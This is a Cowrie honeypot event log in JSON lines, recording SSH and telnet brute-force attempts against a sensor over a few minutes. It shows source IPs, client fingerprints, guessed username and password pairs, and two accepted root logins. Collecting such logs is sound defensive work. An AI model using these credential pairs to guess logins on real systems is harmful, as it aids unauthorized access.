{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:31:22.567283Z","src_ip":"196.251.115.108","session":"99b6c576e982"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qwerty","message":"login attempt [admin/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T22:31:26.304610Z","src_ip":"196.251.115.108","session":"99b6c576e982"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:31:27.780521Z","src_ip":"196.251.115.108","session":"99b6c576e982"}
{"eventid":"cowrie.session.connect","src_ip":"39.104.55.171","src_port":47898,"dst_ip":"1.2.3.4","dst_port":23,"session":"f3954a2b3f85","protocol":"telnet","message":"New connection: 39.104.55.171:47898 (1.2.3.4:23) [session: f3954a2b3f85]","sensor":"my-vps","timestamp":"2025-08-24T22:31:58.285401Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":50576,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1bacb88bac7","protocol":"ssh","message":"New connection: 196.251.115.108:50576 (1.2.3.4:22) [session: b1bacb88bac7]","sensor":"my-vps","timestamp":"2025-08-24T22:32:12.247716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:32:12.538308Z","src_ip":"196.251.115.108","session":"b1bacb88bac7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:32:12.539295Z","src_ip":"196.251.115.108","session":"b1bacb88bac7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123123","message":"login attempt [admin/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T22:32:16.438988Z","src_ip":"196.251.115.108","session":"b1bacb88bac7"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:32:17.696115Z","src_ip":"196.251.115.108","session":"b1bacb88bac7"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":34604,"dst_ip":"1.2.3.4","dst_port":22,"session":"32997c4011d3","protocol":"ssh","message":"New connection: 196.251.115.108:34604 (1.2.3.4:22) [session: 32997c4011d3]","sensor":"my-vps","timestamp":"2025-08-24T22:33:02.333307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:33:03.321723Z","src_ip":"196.251.115.108","session":"32997c4011d3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:33:03.322560Z","src_ip":"196.251.115.108","session":"32997c4011d3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"111111","message":"login attempt [admin/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T22:33:06.612786Z","src_ip":"196.251.115.108","session":"32997c4011d3"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:33:08.170098Z","src_ip":"196.251.115.108","session":"32997c4011d3"}
{"eventid":"cowrie.session.connect","src_ip":"106.14.214.177","src_port":39044,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6304ed59cc5","protocol":"ssh","message":"New connection: 106.14.214.177:39044 (1.2.3.4:22) [session: d6304ed59cc5]","sensor":"my-vps","timestamp":"2025-08-24T22:33:12.080496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:33:12.083817Z","src_ip":"106.14.214.177","session":"d6304ed59cc5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-24T22:33:12.279772Z","src_ip":"106.14.214.177","session":"d6304ed59cc5"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:33:20.084812Z","src_ip":"106.14.214.177","session":"d6304ed59cc5"}
{"eventid":"cowrie.session.connect","src_ip":"147.185.132.54","src_port":57129,"dst_ip":"1.2.3.4","dst_port":22,"session":"58b50d533568","protocol":"ssh","message":"New connection: 147.185.132.54:57129 (1.2.3.4:22) [session: 58b50d533568]","sensor":"my-vps","timestamp":"2025-08-24T22:33:43.841886Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:33:43.995368Z","src_ip":"147.185.132.54","session":"58b50d533568"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":42160,"dst_ip":"1.2.3.4","dst_port":22,"session":"30bfaf83671b","protocol":"ssh","message":"New connection: 196.251.115.108:42160 (1.2.3.4:22) [session: 30bfaf83671b]","sensor":"my-vps","timestamp":"2025-08-24T22:33:51.886989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:33:52.227557Z","src_ip":"196.251.115.108","session":"30bfaf83671b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:33:52.228268Z","src_ip":"196.251.115.108","session":"30bfaf83671b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567","message":"login attempt [admin/1234567] failed","sensor":"my-vps","timestamp":"2025-08-24T22:33:55.533283Z","src_ip":"196.251.115.108","session":"30bfaf83671b"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:33:56.578043Z","src_ip":"196.251.115.108","session":"30bfaf83671b"}
{"eventid":"cowrie.session.closed","duration":120.00244474411011,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:33:58.287739Z","src_ip":"39.104.55.171","session":"f3954a2b3f85"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":49738,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae9bdbcfe1e9","protocol":"ssh","message":"New connection: 196.251.115.108:49738 (1.2.3.4:22) [session: ae9bdbcfe1e9]","sensor":"my-vps","timestamp":"2025-08-24T22:34:41.072750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:34:41.953489Z","src_ip":"196.251.115.108","session":"ae9bdbcfe1e9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:34:41.954240Z","src_ip":"196.251.115.108","session":"ae9bdbcfe1e9"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T22:34:44.491101Z","src_ip":"196.251.115.108","session":"ae9bdbcfe1e9"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:34:45.704146Z","src_ip":"196.251.115.108","session":"ae9bdbcfe1e9"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":41448,"dst_ip":"1.2.3.4","dst_port":22,"session":"50e9fe80997a","protocol":"ssh","message":"New connection: 45.88.8.186:41448 (1.2.3.4:22) [session: 50e9fe80997a]","sensor":"my-vps","timestamp":"2025-08-24T22:35:18.779915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:35:19.385755Z","src_ip":"45.88.8.186","session":"50e9fe80997a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T22:35:19.386433Z","src_ip":"45.88.8.186","session":"50e9fe80997a"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":34532,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f6edea08978","protocol":"ssh","message":"New connection: 45.88.8.215:34532 (1.2.3.4:22) [session: 7f6edea08978]","sensor":"my-vps","timestamp":"2025-08-24T22:35:20.017823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:35:20.513328Z","src_ip":"45.88.8.215","session":"7f6edea08978"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T22:35:20.514057Z","src_ip":"45.88.8.215","session":"7f6edea08978"}
{"eventid":"cowrie.login.success","username":"root","password":"Pakistan123","message":"login attempt [root/Pakistan123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:35:22.128850Z","src_ip":"45.88.8.186","session":"50e9fe80997a"}
{"eventid":"cowrie.login.success","username":"root","password":"Bhaskar@123","message":"login attempt [root/Bhaskar@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:35:22.616581Z","src_ip":"45.88.8.215","session":"7f6edea08978"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:35:22.848027Z","src_ip":"45.88.8.186","session":"50e9fe80997a"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:35:23.108297Z","src_ip":"45.88.8.215","session":"7f6edea08978"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":58514,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd1bd45b65bc","protocol":"ssh","message":"New connection: 196.251.115.108:58514 (1.2.3.4:22) [session: bd1bd45b65bc]","sensor":"my-vps","timestamp":"2025-08-24T22:35:31.190387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:35:31.567122Z","src_ip":"196.251.115.108","session":"bd1bd45b65bc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:35:31.567843Z","src_ip":"196.251.115.108","session":"bd1bd45b65bc"}
{"eventid":"cowrie.login.failed","username":"test","password":"password","message":"login attempt [test/password] failed","sensor":"my-vps","timestamp":"2025-08-24T22:35:35.208181Z","src_ip":"196.251.115.108","session":"bd1bd45b65bc"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:35:36.364053Z","src_ip":"196.251.115.108","session":"bd1bd45b65bc"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59828,"dst_ip":"1.2.3.4","dst_port":22,"session":"62183b904187","protocol":"ssh","message":"New connection: 217.72.205.35:59828 (1.2.3.4:22) [session: 62183b904187]","sensor":"my-vps","timestamp":"2025-08-24T22:35:51.063472Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:35:51.065283Z","src_ip":"217.72.205.35","session":"62183b904187"}
{"eventid":"cowrie.session.connect","src_ip":"211.229.22.152","src_port":47126,"dst_ip":"1.2.3.4","dst_port":23,"session":"57eae7b96745","protocol":"telnet","message":"New connection: 211.229.22.152:47126 (1.2.3.4:23) [session: 57eae7b96745]","sensor":"my-vps","timestamp":"2025-08-24T22:36:12.089437Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":37948,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5451b29a135","protocol":"ssh","message":"New connection: 196.251.115.108:37948 (1.2.3.4:22) [session: f5451b29a135]","sensor":"my-vps","timestamp":"2025-08-24T22:36:21.846010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:36:22.150018Z","src_ip":"196.251.115.108","session":"f5451b29a135"}
